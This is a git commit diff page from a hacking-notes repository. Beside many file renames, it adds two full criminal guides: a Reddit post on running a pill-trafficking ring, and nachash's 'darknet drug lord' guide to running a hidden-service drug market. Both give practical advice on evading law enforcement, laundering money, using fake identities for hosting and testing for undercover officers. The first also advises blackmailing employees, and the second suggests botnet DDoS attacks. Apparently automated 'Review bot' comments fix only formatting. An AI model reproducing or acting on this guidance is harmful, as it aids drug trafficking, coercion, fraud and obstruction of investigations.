
Cleanup; More to do

root 6 years ago
130 changed files with 3027 additions and 986 deletions
  1. +12
  2. +0
  3. +62
      Draft/Alprakings Guide to
  4. +23
      Draft/Anonymity Opsec Privacy
  5. +5
  6. +0
      Draft/Anti-Forensics/Anti-Forensics & Anti-Anti-Forensics тАУ Michael.txt
  7. +55
      Draft/Attacking Defending Android
  8. +4
      Draft/Attacking Defending iOS
  9. +84
      Draft/BIOS UEFI Attacks
  10. +0
      Draft/Basic Security
  11. +329
      Draft/Becoming a Darknet Drug Lord -
  12. +0
      Draft/Building A Pentest
  13. +0
      Draft/Building A Pentest Lab/Lab Buffer Overflows.txt
  14. +0
      Draft/CTFs & Wargames
  15. +22
  16. +2
      Draft/Cheat sheets reference pages Checklists
  17. +0
      Draft/Cheat sheets reference pages Checklists -/Androguard.txt
  18. +0
      Draft/Cheat sheets reference pages Checklists -/Curl.txt
  19. +0
      Draft/Cheat sheets reference pages Checklists -/Linux/Linux.rtf
  20. +0
      Draft/Cheat sheets reference pages Checklists -/Linux/Post Exploitation on Linux.txt
  21. +0
      Draft/Cheat sheets reference pages Checklists -/Linux/QuickRef-Enum.txt
  22. +0
      Draft/Cheat sheets reference pages Checklists -/Linux/System Enumeration.txt
  23. +0
      Draft/Cheat sheets reference pages Checklists -/Linux/cheat sheet Basic Linux Privilege Escalation.txt
  24. +0
      Draft/Cheat sheets reference pages Checklists -/Metasploit.txt
  25. +0
      Draft/Cheat sheets reference pages Checklists -/Ncat.txt
  26. +0
      Draft/Cheat sheets reference pages Checklists -/Nmap Cheat Sheet.txt
  27. +0
      Draft/Cheat sheets reference pages Checklists -/Nmap.txt
  28. +0
      Draft/Cheat sheets reference pages Checklists -/Radare2.txt
  29. +0
      Draft/Cheat sheets reference pages Checklists -/SQLMap Cheat Sheet.txt
  30. +0
      Draft/Cheat sheets reference pages Checklists -/TCPDump.txt
  31. +0
      Draft/Cheat sheets reference pages Checklists -/ToDO.txt
  32. +0
      Draft/Cheat sheets reference pages Checklists -/WebApp Exploitation Cheat Sheet.txt
  33. +0
      Draft/Cheat sheets reference pages Checklists -/Windows/Post Exploitation on Windows.txt
  34. +0
      Draft/Cheat sheets reference pages Checklists -/Windows/Windows System Enumeration.txt
  35. +0
      Draft/Cheat sheets reference pages Checklists -/Windows/Windows.rtf
  36. +0
      Draft/Cheat sheets reference pages Checklists -/sqli cheat.txt
  37. +0
      Draft/Conference Video Archives Stuff
  38. +0
  39. +0
      Draft/Courses & Training
  40. +0
  41. +8
      Draft/Cryptography &
  42. +0
      Draft/Cryptography & Encryption/Linux Systems.txt
  43. +0
      Draft/Cryptography & Encryption/Vids Papers Blogposts.txt
  44. +0
      Draft/Cryptography & Encryption/cull.txt
  45. +0
  46. +0
  47. +0
  48. +0
  49. +31
      Draft/Documentation & Reports
  50. +0
  51. BIN
      Draft/Draft/DRAFT Cyber Security Task Force Insurance Data Security Model Law.pdf
  52. +0
  53. BIN
      Draft/Draft/NIST Cyber Security Framework for Improving Critical Infrastructure 02122014.pdf
  54. BIN
  55. +0
      Draft/Draft/Securing Hardening_1/Securing Linux/Securing Linux.rtf
  56. +0
      Draft/Draft/Securing Hardening_1/Securing OS X/Securing OS X.rtf
  57. +0
      Draft/Draft/Securing Hardening_1/Securing Windows/Cull.txt
  58. +0
      Draft/Draft/Securing Hardening_1/Securing Windows/Securing Windows.rtf
  59. +0
      Draft/Draft/To Do/To Do.rtf
  60. +0
      Draft/Draft/To Do/add cull -3.txt
  61. +19
      Draft/Embedded Device & Hardware Hacking
  62. +0
  63. +308
  64. +0
      Draft/Exploit Development/Lab for Practicing Exploit Writing.txt
  65. +13
      Draft/Forensics Incident
  66. +0
  67. +0
      Draft/Frameworks Methodologies/Metasploit Reference.txt
  68. +0
      Draft/Frameworks Methodologies/Meterpreter Scripts and Description.txt
  69. +0
      Draft/Frameworks Methodologies/PTES - Penetration Testing Execution Standard/Discovery & Probing.txt
  70. +0
      Draft/Frameworks Methodologies/PTES - Penetration Testing Execution Standard/Enumeration.txt
  71. +0
      Draft/Frameworks Methodologies/PTES - Penetration Testing Execution Standard/Network Footprinting.txt
  72. +0
      Draft/Frameworks Methodologies/PTES - Penetration Testing Execution Standard/PTES - Penetration Testing Execution Standard.rtf
  73. +0
      Draft/Frameworks Methodologies/PTES - Penetration Testing Execution Standard/Password Cracking.txt
  74. +0
      Draft/Frameworks Methodologies/PTES - Penetration Testing Execution Standard/Penetration.txt
  75. +0
      Draft/Frameworks Methodologies/PTES - Penetration Testing Execution Standard/VoIP Security.txt
  76. +0
      Draft/Frameworks Methodologies/PTES - Penetration Testing Execution Standard/Vulnerability Assessment.txt
  77. +0
      Draft/Frameworks Methodologies/PTES - Penetration Testing Execution Standard/Wireless Penetration.txt
  78. +0
      Draft/Frameworks Methodologies/Post Exploitation with Metasploit.txt
  79. +66
      Draft/Fuzzing Bug
  80. +14
  81. +0
  82. +926
      Draft/Hacking Team
  83. +0
  84. +0
  85. +73
      Draft/Interesting Things Useful
  86. +0
      Draft/Interesting Things Useful stuff/Writeup of Gamma Group Hack.txt
  87. +7
      Draft/Internet of
  88. +0
  89. +0
  90. +260
  91. +0
      Draft/Malware/Detect Virtualbox C prog.txt
  92. +141
      Draft/Network Attacks &
  93. +0
      Draft/Network Attacks & Defenses/Getting Busy at the Command Line.txt
  94. +4
      Draft/Network Security Monitoring &
  95. +31
      Draft/Open Source
  96. +0
      Draft/Open Source Intelligence/Active cull.txt
  97. +0
      Draft/Password Bruting and
  98. +0
  99. +1
  100. +59
      Draft/Privilege Escalation &

+ 12
- 0
Draft/1aCompleted_List

@ -0,0 +1,12 @@
Completed Sections(Have gone through once, cleared most of cull)
Sys internals
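Review bot: "Completed Sections(Have gone through once, cleared most of cull)" is missing a space before the parenthesis, and the single entry "Sys internals" does not match any path in the visible change list, so it is unclear which file or folder this marks as completed; use the actual Draft/... path so the list can be checked against the tree.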

Draft/Draft/ → Draft/

+ 62
- 0
Draft/Alprakings Guide to

@ -0,0 +1,62 @@
Alpraking's OPSEC guide to being a successful kingpin.
submitted 5 hours ago * by AlpraKing
For sale only $1999.97 unti.....
pls UPVOTE cuz FREE.
So you want to ship hundred of thousand of pills a week for years and stay safe?
Here's a couple of tips to keep you safe. I've been here since SR 1.0 under various aliases and have, over the course of my-3 years online career , shipped over 10 million pills. I used to press pills myself. Now last time i've seen a press was a year ago. I'm basically just smoking bowls and trolling on reddit now.
1. Outsource
Outsourcing simply refers to the noble art of hiring other people, "pawns of the checker", to do the dirty work. You want to hire clean people that dont arise suspicions. They will be doing the dirty work so you want to hire someone who isn't already involved in drug trade or has priors. Don't get me wrong, you'll do everything in your power to protect them. Remember, if your guys catch heat, it can propagate to deeper layers fairly quickly and ultimately, to you.
2. Separate Administration & Execution
Have a layer of people who are doing the "boss" work and another one who is doing the "executive" work. Boss work is mainly paperwork and verifications to ensure everyone is doing his job properly and numbers balance and quality control is in check. Administrators dont get their hand dirty as that they will not handle the drugs themselves, but they will make sure packs are being shipped, tracking codes are being handled, productions are being made correctly and such. Administration is a promotion for executives who have shown a great degree of skill and loyalty. You can't put just anyone to overlook someone else's work. You have to get someone who has done it before and will be able to train new personnel or solve irregular issues. I normally promote my executors to administrators once they have shown that they can handle any issue from their business. I have them hire one of their friend and pay both from my own pocket. Employees kind of like hearing "hey, how about you keep your salary, train your friend to do your job, and you both will earn the same thing, paid from the big boss' pocket." More than money, people want power. Give power to people who want power and keep the money for yourself.
3. Treat your employees well but do NOT overpay them.
Treat your employees well by giving them insurances, paid vacations & trips, surprises bonuses, gifts and such. Do NOT give them a large payout even if they're pressing or shipping hundreds of thousands of pills. If someone becomes too comfortable with his pay, his quality of work will lower. you have to keep your employees dependant on you. Overpaying employees = Bad work. Double loss. For example in my own company all employees have a health insurance. they are allowed up to 1500/month in private medical, psychological bills paid by my expense) If not used, it will be given as a bonus vacation trip every couple months. Any lawyer time they might need for questions is also paid by the company.
4. Don't hire people under 30 years old
Both in the administrative and executive field. People under 30 years old are reckless, like to hang out in bars and brag to friends. People over 30 years old (get 40,50+ if you can) tend to be more straight with their shit. Much less likely to steal or botch the work and normally know the value of money. If you can get someone 40 yo+ that doesn't have a record, its most likely someone who already had a full-time job and knows how to work decently and not do dirty shit. Im 20 btw.
5. Inform your people
Tell them the truth. what they're risking, what to expect, have them meet your own loyal people who already been arrested for you and have them testify about the backup they had for not snitching. People will be much less likely to switch on you if you've told them exactly the truth. Don't go around with "There's no risk!" bullshit. Not only will your guys not believe you but they'll totally go nuts when they get arrested if you do.
6. Back your own people
Make sure all of your people are properly lawyered up. have them know by heart the name and phone number of their designated lawyer (under your control) and have them meet regularly, all expenses paid by you, in order to strengthen this trust between the lawyer and the employee.
7. Don't hire people yourself
People close to you, that you love and value, should not be getting their hands dirty on the long run. have them quit, or promote them quickly, if you have them on the field. As soon as they've mastered their work, have them hire their own friend to do your work, and pay both.
8. Rotate your employees between jobs
By rotating your employees between various work in your company you not only prevent heat from accumulating on one particular place or person, confusing investigations, but you're also contributing to their general training. this has various positive consequences; You are able to better target the quality and flaws of your various employees by having them try numerous different things. Also, if a branch of the operation is arrested, you can quickly reach out to your other personnel who has done similar work in the past to fill the voids.
9. Have separate different secret workspots, and different labs.
In order to confuse investigations, its mandatory to have different personnel, workspots, and labs. If i feel that heat is growing on one lab, I can quickly clean it up, have the worker stop and lay low for a while, and i simply transfer the workload over another less-heated up lab and production-guy. Its very difficult to see all the connections amongst various people especially when dealing with over 30 employees, but its needed. These connections are what will carry heat. I tend to think of it a bit like a computer would:
10. Get it down to numbers. (TLDRs; skip this part)
its hard to explain this part with words so I'll give an example with numbers.
You suspect your packs are being profiled. If there is profiling going on, your courier is going to be considered the starting point of the heat. We will give it a 80% heat rating for this very event. Considering the courier access 3 times a week a stash, you will give the stash a 50% heat rating, just from this very link. the stash himself is linked to the lab, but only access it onces every 2 weeks. you will give your lab a 15% heat rating from this very event. Your treshold of risk is 70% (meaning you will shut down someone/somewhere that has over 70% heat rating), at this point you will shut down the courier and have him lay low, but the heat is not yet sufficient to close the stash and the lab, at 50% and 15% respectively
Now a few days later you see a cop car parked on the street of your lab. This very event is worth 50% heat on your lab, and will also drip a 20% heat on your stash and 5% on your courier due to the links.
Now shit got hot. Everything is above 70%. closing the entire branch.
You'll admit it doesn't take math to notice that if your packs are being profiled AND a cop car is seen near your lab, you must be pretty hot as a whole and you SHOULD shut down. All I did was add numbers to follow the flow of heat and decide wisely what is hot and what is not. My objective is to keep all places around 30-40% heat which i consider a stable zone. If 60-70% is reached im going to start investigating very closely, but I will not close it down. If it busts 80% then its being closed down and laid low for a few weeks. Its not accurate because you have to estimate everything with little to no information, but it definitely helps seeing things and calculate your moves. If an event bust 150%, i will completely dismantle the place and move it to another spot.
11. Trust buffers.
Always have a layer of administration between you and your executives. You don't hire any executives, have your administrators do it. By doing so, NO ONE at risk of being busted knows who you are, let alone that you exist. If employees get caught and want to snitch, all they'll snitch is your administrator, who you should have sufficient trust in to believe he wont snitch you also.
12. Family links between employees are powerful.
If you testify in court, you don't get to choose who you snitch and who you don't (In Canada at least). You snitch everything or nothing. So it helps if employees get caught with members of their families, because they are much less likely to snitch as it would involve having them snitch on their own family. You can also use the trust between members of a single family to your advantage. You can normally trust your employee's brother or sister pretty much the same as you can trust your employee. assuming both work for you.
13. Control the money
Do not reveal how much you're making or how much people are making relative to one another. Its none of their business. I normally fund in cash one of my administrators with a lot of cash and he pays everyone by sending them cash in the mail, or bitcoins. He makes comptability records and bring them to me so i can see where the money went, before I handle more cash/btc to him.
14. Encrypt everything
Have your employees familiar with tails & tor+pgp communications. Anyone minially professional will take some notes. Make sure all your employees from the top to the bottom is familiar with TAILS and has a secure passphrase. Have them place all their documentation and notes there. Any paper hanging around must be burned.
15. Avoid keeping illegal shit around the "dangerous hours".
I refer to "Dangerous hours" as week-days 5AM to 8AM. My experience has shown me 90% of large drug raids occur during this time period.
16. Not everyone has to know everyone.
Its everyone's dream to think its like the movies where we gangsta organise "cartel parties" where everyone is invited. It doesn't work that way. If someone doesn't have to meet someone, don't make them meet. Don't take the risk of adding up more "heat rating" by creating un-necessary links between individuals who are not directly connected.
17. Keep "jokers"
Jokers are last-resort cards that allow you to solve dangerous issues or take-over control of your business in the event of catastrophic problems. Pictures of your employees naked, hacked passwords to their facebooks, knowing their addresses, etc. Anything you can use against them if shit goes wrong helps.
18. Be diplomat when kicking people out
Always be very diplomat when kicking people out. Give them a nice fat good-bye paycheck and specify you're giving them this paycheck to "forget everything". Keep good terms and explain your decisions with opsec and that you're doing this for their own protection.
19. If your company screw up, pickup the pieces, dont flee.
Believe me, its worth more in the long run if you admit to being busted/admit to problems, refund everyone, close shop for a few months, and come back, than it is to exit scam and start under a new name. It builds confidence in the long run. Its easy to be honest when your business goes well. But its in the bad moments that you show your true face. If you've been fucked in the past, been honest with everyone then came back, it gives an assurance that the same will happen if there's a fuckup in the future. How many vendors look so perfect until they start having issues? and when they do, most will run with customers money. If you are honest with customers despite problems, it will reward you later. It also helps looking at yourself in the mirror in the morning knowing you haven't fucked over a ton of people with less wealth than you.
20. Always change
Always change lab locations, stealth, rotate employees, open and closes front or laundering shops. Have several at the same time so you can switch work between places. Its like playing whack a mole with LE. If you stay too long in one single place, you'll get caught. I do not believe in "megalabs" with super OPSEC that are stable for years. A decentralised network of several small labs & dispatch places, constantly changing places, is the best. Its even better when you can afford to change places AND employee at the same time. Literally drops heat rating to 0%
21. Make sure your team's opsec is always on point.
Meet regularly with your administrators and have them tell you all the problems. Never get angry and don't judge them. They'll be much more open if they do not fear your reaction. Everyone can make mistakes. Your administrators should have the same attitude toward their employees. A transparent company allows you to see more problems and react accordingly.
22. Don't flash
Don't. Just don't. Fuck nice cars & nice houses as long as you are on the field or know directly people who work on the field. That will get you heated up more than anything else. Pile your money, hide it and work on laundering it with as much care and opsec as you do with your drugs. Fuel it in a legitimate business, with customers, then start laundering it slowly. Remember, as long as your money isn't properly laundered, its virtual. Anything you buy with it is a cursed gift that will increase your own heat and can also potentially be seized by LE. You can start flashing when all your work has been securely outsourced or when you retire.
23. Dont get high on your own supply
You should actually never even have your own supply in your house or somewhere that could be linked to you. It also impairs your judgement and can worsen paranoia, narcissism and other personality problems you tend to develop being in the drug business. Especially Xanax. Dont take Xanax and take important decisions; you will regret it.
24. Prepare for an arrest
Prepare yourself, psychologically and with your lawyer, your family, your administrators, in the event of a bust. Make sure you have cash readily accessible by your trusted people and have a plan. You won't be able to interact much with the outside world starting the very moment your door is rammed. And you won't be told when it would happen. Run "simulations" of a scenario where you and several of your administrators are arrested. Make sure someone can take your place or at least handle your personnal stuff, and get yourself a lawyer early on the payroll. Everytime you go to sleep in your bed, it might be the last night you get to pass there for a couple years. And everytime you peacefully wake up in the morning, congrats yourself that you have survived yet another day.
The end
Well not really, I wrote that nonstop just spewing out ideas. I think I could continue until 100. but my coke binge is over and i'm growing tired of writing. Good luck with your high-volume ambition, plebs. >:)
P.S. Whoever is pressing fentanyl in xanax bars; Stop. Please. You're attracting LE attention on my game and making me lose sales due to everyone freaking the fuck out in the streets. And you're killing people. It's wrong.
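Review bot: This file pastes the Reddit post together with its page chrome ("submitted 5 hours ago * by AlpraKing", "For sale only $1999.97 unti.....", "pls UPVOTE cuz FREE.") but records no source URL or retrieval date, so the provenance of the text cannot be checked later; add a one-line source reference at the top and drop those three lines, which carry no content. The same applies to the closing "The end" / "P.S." block if the intent is a reference note rather than a verbatim archive.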

Draft/Draft/Anonymity Opsec Privacy → Draft/Anonymity Opsec Privacy

Draft/Draft/ → Draft/

Draft/Draft/Anti-Forensics/Anti-Forensics & Anti-Anti-Forensics – → Draft/Anti-Forensics/Anti-Forensics & Anti-Anti-Forensics тАУ Michael.txt

Draft/Draft/Attacking Defending Android → Draft/Attacking Defending Android

Draft/Draft/Attacking Defending iOS → Draft/Attacking Defending iOS

Draft/Draft/BIOS UEFI Attacks → Draft/BIOS UEFI Attacks

Draft/Draft/Basic Security → Draft/Basic Security

+ 329
- 0
Draft/Becoming a Darknet Drug Lord -

@ -0,0 +1,329 @@
So, you want to be a darknet drug lord...
by nachash
[The advice in this article can be adapted to suit the needs of other
hidden services, including ones which are legal in your jurisdiction.
The threat model in mind is that of a drug market. The tone is that of a
grandfather who is always annoyingly right, who can't help but give a
stream-of-consciousness schooling to some whippersnapper about the way
the world works. If this article inspires you to go on a crime spree and
you get caught, don't come crying to me about it.]
You've decided that you're bored with your cookie-cutter life of working
at a no-name startup, getting paid in stock options and empty promises.
You want a taste of the good life. Good for you, kid. I used to run a
fairly popular hidden service (DOXBIN) that was seized by the FBI after
3 1/2 years of spreading continuous butthurt, then subsequently
repossessed from the feds. Because I managed to not get raided, I'm one
of the few qualified to instruct others on hidden services and security,
simply because I have more real-world experience operating hidden
services than the average tor user. In other words, very little of this
advice is of the armchair variety, as you'll often find in abundance the
Internet. But enough about me. Let's talk about your future as an
internet drug lord.
1. Legal/Political
First things first, you need to cover the legal, historical and
political angles. Read up on various drug kingpins and cartels from the
20th century. Learn everything you can about how they rose and fell (
you can safety ignore all the parts about intelligence agencies backing
one drug cartel over another, because that's not going to happen to
you). Once you've got a good command of that, read everything you can
about busted drug market operators and branch out into cybercrime
investigations as well. It wouldn't hurt to make yourself familiar with
law enforcement and intelligence agency tactics either. You'll find that
virtually all drug kingpins either get murdered or go to prison. Let
those lessons sink in, then find a good drug lawyer and make plans for
being able to pay them when The Man seizes everything you own. While
you're dreaming big about making fat stacks of fake internet money, do
some research on Mutual Legal Assistance Treaties and extradition treaties.
Mutual Legal Assistance Treaties (MLATs) are self-explanatory. Country A
will help Country B do whatever it takes to aid a cybercrime
investigation should some aspect of the crime bleed over into Country A.
Figure out which countries don't provide legal assistance to your
country in these cases, then find hosting services that are based there.
You'll shorten this list by determining which hosts allow tor, or at
least don't explicitly forbid it in their Terms of Service (you don't
care about exit bandwidth. You just want relays. Remember this for later
in the article). Last but not least, sort out which hosts accept payment
options that don't make you sweat bullets over the fact that the NSA has
been monitoring global financial transactions since at least the 1970s.
You will want to avoid any host that advertises itself as bulletproof --
they'll probably kit your box and siphon everything of value, in
addition to overcharging you for the privilege of running on older
hardware -- and any host which sells a cheap VPS and promises to
guarantee your privacy.
Extradition treaties mean that if you're in Country A and do something
that makes Country B want to prosecute you, Country A is most likely
going to give you a one way ticket to Country B. If or when your box
gets seized and you know the heat is on, you're going to want to beat it
to a place that won't send you back, where you will presumably live out
the rest of your days. Just make sure you've made enough money to grease
all the right palms in your new life, or the road ahead may be extremely
bumpy. If you're smart, you'll permanently move to this country well
before you have any trouble with law enforcement.
One last thing before moving on: Don't be so stupid as to attempt to
hire a hitman to kill anyone. Murder-related charges have no statute of
limitations, which means you won't get to write a tell-all book about
what a sly bastard you are when this wild ride is a distant memory. If
you've reached a point in your new career where murdering people makes
sense, it's time to walk away. Don't get corrupted like Dread Pirate
2. Technical
This section tries to be as operating system independent as possible.
You'll want to consult the documentation of your OS for specifics. The
technical side of running a hidden service and not getting owned by cops
is a lot harder than just installing stuff and crossing your fingers.
The recommendations in this section WILL NOT protect you from 0days in
the wild, but should help somewhat with damage control. Remember, if
they want to own your hidden service, it will probably happen eventually.
Before you even think about installing bitwasp and tor, you need to
really understand how tor works. Go to and read the white
papers until your eyes glaze over, then continue reading until you're
out of papers to read. Pay particular attention to the hidden service
papers. If you feel like you didn't understand something, come back to
that paper again when you have more knowledge. A lot of the papers
explain some of the same concepts with slight differences in the intros.
Don't skim over them, because you might read someone's rewording that
will clarify an idea for you. Check back with freehaven regularly. Once
you're up to speed, a good next step is to keep up with the tor
project's mailing lists. [1]
While you're doing all of this reading, it's (mostly) safe to go ahead
and install tor on a box on your local network, purely for
experimentation. Keep in mind that the NSA will start scooping up all of
your packets simply because you visited That means don't
post code questions related your drug market on Stack Exchange, if you
want to avoid giving The Man morsels he can use for parallel
construction. Once you've gotten hidden services working for http and
ssh, you're going to take the first baby step towards evading casual
discovery: Bind your hidden services to localhost and restart them.
The next step in your journey towards changing the drug business forever
is to grab the transparent proxying firewall rules for your operating
system to make sure they work. [2] They will guard against attacks that
cause your box to send packets to a box the attacker controls, which is
useful in thwarting attempts to get the box IP. You may wish to have a
setup similar to an anonymous middle box, preferably without public IPs
where possible, so if your application gets rooted tor isn't affected.
Speaking of applications, do everything you can to ensure that the
application code you use to power your hidden service isn't made of
Swiss cheese and used bandaids. To protect against other types of
attacks, you will want to identify any pre-compiled software that your
users will touch and compile it yourself with hardening-wrapper or it's
equivalent, plus any custom flags you want to use. If you keep
vulnerabilities from the application and server to a minimum, your
biggest worries will be tor-related.
You will only connect to your production box via a hidden service. It's
a good idea to get into that habit early. The only time deviating from
this pattern is acceptable is when you have to upgrade tor, at which
time you'll want to have a script ready that drops your firewall rules
and unbinds ssh from localhost just long enough for you to login, do the
upgrade, re-apply the firewall rules and bind ssh to localhost again. If
you're not ready to deal with the latency, you're not ready to do any of
this. Don't forget to transparently proxy the machine you use too, so
you don't slip up by mistake.
On the subject of the machine, you need to automate the process of both
setting up your hidden service and of destroying it. Proactively change
servers every few months, in order to frustrate law enforcement attempts
to locate and seize your site. Your creation script should install
everything your site needs as well as all configuration files. Your
clean-up script needs to destroy all evidence, preferably with a tool
like srm.
Regarding time-related issues: Always select either UTC or a time zone
that doesn't match the box's location. You will also do this to the box
you use to interact with your hidden service every day. If you read the
whitepapers, you will probably note a recurring theme of clock
skew-related attacks, mostly directed at clients, in some of the older
papers. Tor won't even start if the clock skew is off by too much.
If you want to have some fun at the expense of business in the short
term, intentionally take your service offline periodically in order to
mess up attempts to match your downtime with public information. If
you're the kind of person with access to botnets, you could DDoS
(Distributed Denial of Service) some provider at the same time on the
off chance that someone might connect the dots. This counter-measure
will only work on researchers looking at public info, not nation state
actors with an ax to grind.
I've saved some of the hardest stuff for the last part of this section.
It's hard because you have to make choices and it's unclear which of
those choices are the best. It's a bit like a Choose Your Own Adventure
book. In that spirit, all I can do is lay out the possibilities in as
much of a Herodotus-like way as possible.
One thing you have to consider is whether you want to run your hidden
service as a relay or not. If it's a relay, you'll have extra cover
traffic from other innocent tor users. But if your relay goes down at
the same time as your hidden service, it will be far more likely to be
noticed. Federal criminal complaints make a big deal of seized hidden
services not being relays, but three relays were taken down at around
the same time as Operation Onymous, so that's not a guaranteed defense.
The choice is yours.
Remember when I said to take note of hosts that don't ban tor outright?
This is the part where you give back to the community in the form of tor
relays or bridges. [3] The feel-good aspects of this move are along the
same lines as drug barons who build schools and hospitals, but this is
more immediately self-serving. You're going buy several servers to set
up strictly as relays or bridges, then configure your hidden service box
to use only those relays or bridges to enter the tor network. Here's
where things start to get theoretical.
If an adversary is running a guard node discovery attack -- in which an
attacker is able to determine the node you're using to enter the tor
network -- against your service and you're using your own relays as
entry nodes, the damage they can do will be limited to DoS (Denial of
Service) if your relays are not linkable to your identity. However, if
you're entering the tor network with bridge nodes, an attacker will
probably say "WTF?" at first unless they determine they've found a
bridge node. Bridge nodes don't use nearly as much bandwidth as relays
because there is not a public list of them, so an intelligence agency
would have less traffic to sift through, which makes correlation easier.
On the other hand, using bridge nodes also allows you to run obfsproxy
[4] on both the bridges and your hidden service. obfsproxy allows you to
make tor traffic appear to be another type of traffic, which is a good
defense against non-Five Eyes entities. For example, your hosting
provider may decide to monitor for tor traffic for their own reasons.
Just make sure your relays/bridges aren't linkable to you or to each other.
One last thing about guard node discovery attacks: The Naval Research
Lab published a paper in July 2014 about the "Sniper Attack," [5] which
in short works like this: The attacker discovers your guard nodes, then
uses an amplified DoS trick to exhaust the memory on all of your nodes.
The attacker keeps doing this until your hidden service uses guard nodes
that they control. Then it's game over. If your hidden service's entry
nodes are all specified in your torrc file and they get DoSed, your
service will go offline. In this situation, if all of your relays are
down, you essentially have an early warning canary that you're being
targeted. In other words: This is the best possible time to book your
one-way ticket to your chosen non-extradition country. For those of you
with a background in writing exploits, this is similar in principle to
how stack smashing protection will render some exploits either unable to
function or will turn them into a DoS. Personally, I recommend an
ever-changing list of relays or bridges. Add a few new ones at a
pre-determined interval, and gradually let old ones go unpaid.
3. Operational Security
This section is critical, especially when things start to break down. If
everything else goes bad, following this section closely or not could be
the difference between freedom and imprisonment.
This is important enough to re-state: Transparently proxy your tor
computer. This is a good first line of defense, but it is far from the
only way to protect yourself.
Do not contaminate your regular identity with your Onion Land identity.
You're an aspiring drug kingpin. Go out and pay cash for another
computer. It doesn't have to be the best or most expensive, but it needs
to be able to run Linux. For additional safety, don't lord over your new
onion empire from your mother's basement, or any location normally
associated with you. Leave your phone behind when you head out to manage
your enterprise so you aren't tracked by cell towers. Last but not least
for this paragraph, don't talk about the same subjects across identities
and take counter-measures to alter your writing style.
Don't log any communications, ever. If you get busted and have logs of
conversations, the feds will use them to bust other people. Logs are for
undercover cops and informants, and have no legitimate use for someone
in your position. Keep it in your head or don't keep it at all.
At some point, your enterprise is going to have to take on employees.
Pulling a DPR move and demanding to see ID from high-volume sellers and
employees will just make most people think you're a fed, which will
leave your potential hiring pool full of dumbasses who haven't even
tried to think any of this out. It will also make it easier for the feds
to arrest your employees after they get done arresting you. If your
enterprise is criminal in nature -- whether you're selling illegal goods
and services or you're in a repressive country that likes to re-educate
and/or kill dissidents -- an excellent way of flushing out cops is to
force them to get their hands not just dirty, but filthy, as quickly as
possible. Don't give them time to get authorization to commit a crime
spree. If there's a significant amount of time between when they're
given crimes to commit and the commission of those crimes, you need to
assume you've got an undercover cop on your hands and disengage. If they
commit the crime(s) more or less instantly, you should be fine unless
you've got the next Master Splynter on your trail. [6]
Disinformation is critical to your continued freedom. Give barium meat
tests to your contacts liberally. [7] It doesn't matter if they realize
they're being tested. Make sure that if you're caught making small talk,
you inject false details about yourself and your life. You don't want to
be like Ernest Lehmitz, a German spy during World War II who sent
otherwise boring letters about himself containing hidden writing about
ship movements. He got caught because the non-secret portion of his
letters gave up various minor personal details the FBI correlated and
used to find him after intercepting just 12 letters. Spreading
disinformation about yourself takes time, but after a while the tapestry
of deceptions will practically weave itself.
Ensure that your communications and data are encrypted in transit and at
rest whenever applicable. This means PGP for e-mail and OTR for instant
messaging conversations. If you have to give data to someone, encrypt it
first. For the tor-only box you use for interacting with your hidden
service, full disk encryption is required. Make a password that's as
long and complex as you can remember ("chippy1337" is not an example of
a good password). Last but not least, when you're done using your
dedicated tor computer, boot into memtest86+. Memtest86+ is a tool for
checking RAM for errors, but in order to do that it has to write into
each address. Doing so essentially erases the contents of the RAM.
Turning your computer off isn't good enough. [8] If you're planning to
use TAILS, it will scrub the RAM for you automatically when you shut
down. Once your RAM is clean, remove the power cord and any batteries if
you're feeling extra paranoid. The chips will eventually lose any
information that is still stored in them, which includes your key. The
feds can do a pre-dawn raid if they want, but if you follow this step
and refuse to disclose your password, you'll make James Comey cry like a
small child.
Use fake info when signing up for hosting services. Obfuscate the money
trail as much as possible and supply fake billing info. I prefer
registering as criminals who are on the run, high government officials,
or people I dislike. If your box gets seized and your hosting company
coughs up the info, or if a hacking group steals your provider's
customer database (It happens more often than you'd think), your hosting
information needs to lead to a dead end. All signs in Operation Onymous
point to operators being IDed because they used real info to register
for hosting service and then their box got decloaked.
Speaking of money, you're going to have to figure out how to launder
your newfound assets, and we're not talking about using a couple bitcoin
laundering services and calling it a day. You also shouldn't go out and
buy a Tesla. Living beyond your means is a key red flag that triggers
financial and fraud investigations. Remember, money is just another
attack vector. Washing ill-gotten gains is a time-honored drug business
tradition and one that you would be a fool not to engage in. You can
only use your hard-won profits to send packages to
people you don't like so many times.
Take-away: If you rely only on tor to protect yourself, you're going to
get owned and people like me are going to laugh at you. Remember that
someone out there is always watching, and know when to walk away. Do try
to stay safe while breaking the law. In the words of Sam Spade, "Success
to crime!"
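Review bot: footnote markers [3] through [8] are cited in this hunk (the relay/bridge advice, obfsproxy, the "Sniper Attack" paper, Master Splynter, barium meat tests, and the RAM-remanence claim behind "Turning your computer off isn't good enough") but the added file ends at "Success to crime!" with no footnote list, so none of those citations resolve. Either append the source's reference list to the file or strip the bracketed numbers so readers do not go looking for notes that were never committed.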

Draft/Draft/Building A Pentest → Draft/Building A Pentest View File

Draft/Draft/Building A Pentest Lab/Lab Buffer Overflows.txt → Draft/Building A Pentest Lab/Lab Buffer Overflows.txt View File

Draft/Draft/CTFs & Wargames → Draft/CTFs & Wargames View File

+ 22
- 0
Draft/Car View File

@ -0,0 +1,22 @@
#Car Hacking
[Introduction to Hacking in Car Systems - Craig Smith - Troopers15](
Yet Another Car Hacking Tool](
* CANToolz is a framework for analysing CAN networks and devices. This tool based on different modules which can be assembled in pipe together and can be used by security researchers and automotive/OEM security testers for black-box analysis and etc. You can use this software for ECU discovery, MITM testing, fuzzing, bruteforcing, scanning or R&D testing and validation
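Review bot: the link markup in this hunk is broken: both markdown links end at "](" with no URL, and the CANToolz entry is missing its opening "[" before "Yet Another Car Hacking Tool", so neither renders as a link. "#Car Hacking" also needs a space after "#" to render as a heading in most markdown engines. The hunk header reports 22 added lines but only four are shown here; confirm the missing lines are not the URLs that were dropped.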

Draft/Draft/Cheat sheets reference pages Checklists → Draft/Cheat sheets reference pages Checklists View File

Draft/Draft/Cheat sheets reference pages Checklists -/Androguard.txt → Draft/Cheat sheets reference pages Checklists -/Androguard.txt View File

Draft/Draft/Cheat sheets reference pages Checklists -/Curl.txt → Draft/Cheat sheets reference pages Checklists -/Curl.txt View File

Draft/Draft/Cheat sheets reference pages Checklists -/Linux/Linux.rtf → Draft/Cheat sheets reference pages Checklists -/Linux/Linux.rtf View File

Draft/Draft/Cheat sheets reference pages Checklists -/Linux/Post Exploitation on Linux.txt → Draft/Cheat sheets reference pages Checklists -/Linux/Post Exploitation on Linux.txt View File

